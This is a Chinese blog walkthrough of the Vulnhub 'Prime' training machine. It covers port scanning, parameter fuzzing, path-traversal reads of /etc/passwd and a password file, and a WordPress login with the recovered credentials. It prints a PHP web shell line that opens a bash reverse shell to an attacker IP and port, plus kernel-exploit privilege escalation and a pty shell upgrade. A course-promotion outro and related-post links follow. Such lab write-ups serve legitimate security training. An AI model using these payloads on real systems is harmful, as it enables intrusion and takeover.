靶场笔记-Vulnhub Prime

已于 2024-01-09 16:48:28 修改
阅读量35 收藏
点赞数
文章标签: 服务器
于 2023-08-07 09:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44005305/article/details/132115750
版权

一、常规nmap扫描

sudo nmap --min-rate 10000 -p- 192.168.160.176 
sudo nmap -sU --min-rate 10000 -p- 192.168.160.176
sudo nmap -sT -sV -O -p22,80 192.168.160.176
sudo nmap --script=vuln -p22,80 192.168.160.176

二、web80端口渗透

1. web目录扫描

  • sudo dirb http://192.168.160.176/
    发现是WordPress以及dev目录下的提示

  • sudo dirb http://192.168.160.176/ -X .zip,.txt,.php -o report/dirb.txt
    进一步扫描指定后缀文件,发现有三个链接
    http://192.168.160.176/image.php
    http://192.168.160.176/index.php
    http://192.168.160.176/secret.txt
    其中secret.txt有以下提示
    image

  • 根据提示打开https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web,发现是让我们用wfuzz扫描参数

  • wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147http://192.168.160.176/image.php?FUZZ=something

  • wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.160.176/index.php?FUZZ=something
    参数扫描发现file参数:
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MEhdbHQy-1691198389631)(https://image.3001.net/images/20230206/1675695667_63e116333808a17a8840d.png!small)]

2. 参数爆破

  • 结合前面secret.txt提示到的查看location.txt和file参数,拼接查看
    sudo curl http://192.168.160.176/index.php?file=location.txt
    image

  • 得到提示在另一个链接使用secrettier360参数测试
    sudo curl http://192.168.160.176/image.php?secrettier360=
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NUaPClac-1691198389634)(https://image.3001.net/images/20230206/1675695777_63e116a137794734ce2ef.png!small)]

  • 考虑到上个file参数是文件包含,这个参数也测试文件包含试试读取/etc/passwd,发现有效
    sudo curl
    http://192.168.160.176/image.php?secrettier360=…/…/…/…/…/…/etc/passwd
    image

  • 根据提示找到密码文件
    sudo curl
    http://192.168.160.176/image.php?secrettier360=…/…/…/…/…/…/home/saket/password.txt
    image

  • 利用victor和follow_the_ippsec,登录WordPress后台
    image

三、WordPress渗透

  • 尝试插件和主题模块漏洞,发现主题编辑器有个secret.php文件可以写shell

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.160.131/443 0>&1'"); ?>

image

  • 连接shell后成功获取基础shell权限,并得到第一个flag
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QxbzXjMe-1691198389640)(https://image.3001.net/images/20230206/1675696118_63e117f67b489b57f6f4e.png!small)]

四、提权

  • 尝试过sudo,suid等提权方式发现无效,只能开始尝试内核提权,kali搜索相应内核版本漏洞
    image

  • 上传45010.c文件,在靶机上编译并运行,提权成功
    image

  • 但是返回的不是交互式shell,这里利用dpkg -l查看有没有python组件,利用python生成一个交互式shell

    python -c “import pty;pty.spawn(‘/bin/bash’)”

image

  • 获取第二个flag:
    image

-POBpEmQ6-1691198389643)]

  • 获取第二个flag:
    [外链图片转存中…(img-oOWs216W-1691198389644)]

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

教IT的无语强
关注
靶场笔记- Vulnhub prime
Timerings的博客
02-11 107
Vulnhub Prime实战靶场笔记
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1768
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
红队笔记5-Prime1打靶流程-模糊测试+内核提权(vulnhub
qq_63442530的博客
03-18 1061
学习的视频是哔哩哔哩红队笔记:「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!_哔哩哔哩_bilibili打靶时参考文章和本文借鉴文章:红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)_prime1靶机-CSDN博客靶机下载链接见:https://download.vulnhub.com/sickos/sick0s1.1.7zSudo nmap -sn 192.168.254.0/24目标主机ip:192.254.168.1441.快速扫描发现存活
红队笔记6-Prime1打靶流程-提权-OpenSSL解密(vulnhub
qq_63442530的博客
03-19 1209
本篇文章是根据靶场作者给出的提权通过openssl解密获得saket用户密码,在saket用户sudo -l提权成功,没有使用内核提权,也是作者想让我们学习openssl解密:1.enc运行密码的查找:find 找备份文件->缺少密码时可以通过查找备份文件可能存有密码2.密钥的处理:我们获得密钥,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数。
vulnhub靶场PRIME:1打靶过程记录
didiplus
07-17 3046
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
vulnhub靶场 prime1靶机获得flag
weixin_43410194的博客
08-17 2000
vulnhub靶场 prime1靶机获得flag
打靶:vulnhub中的Prime1
qq_73865998的博客
04-18 1547
复现视频:【「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!
Prime靶场
wcl20010的博客
05-02 479
prime靶场vulnhub靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
Vulnhub靶机:PRIME_ 1
LainWith的博客
12-10 616
Prime(此系列共1台)发布日期:2019年9月1日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描目录爆破文件扩展名爆破强制访问文件包含漏洞WordPress利用内核提权。
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2424
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
awk 切割字符串 shell linux
abc
09-24 356
shell linux awk 切割字符串。
Linux-L14-Linux中把用户加入到管理者root中
禅:戒定慧
09-25 493
将普通用户添加到root组
进程的环境
最新发布
weixin_64501326的博客
09-29 551
当程序执行时,其main函数是如何被调用的;命令行参数是如何传递给新程序的;典型的存储空间布局是什么样式;如何分配另外的存储空间;进程如何使用环境变量;进程的各种不同终止方式等。另外,还将说明longjmp和setjmp函数以及它们与栈的交互作用。
如何禁止非真实用户的ip访问网站服务器
tmddj90274的博客
09-27 282
为了禁止非真实用户的IP访问网站服务器,可以采用多种技术手段和策略。
如何让服务器自动封禁低质量ip
okgje90724的博客
09-27 387
要让服务器自动封禁低质量IP地址,可以采用以下步骤和策略。
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
...如果你使用的是Windows系统,推荐参考《01-Windows安装phpstudy》教程来设置这两个环境。...通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际环境中应用相应的防护策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值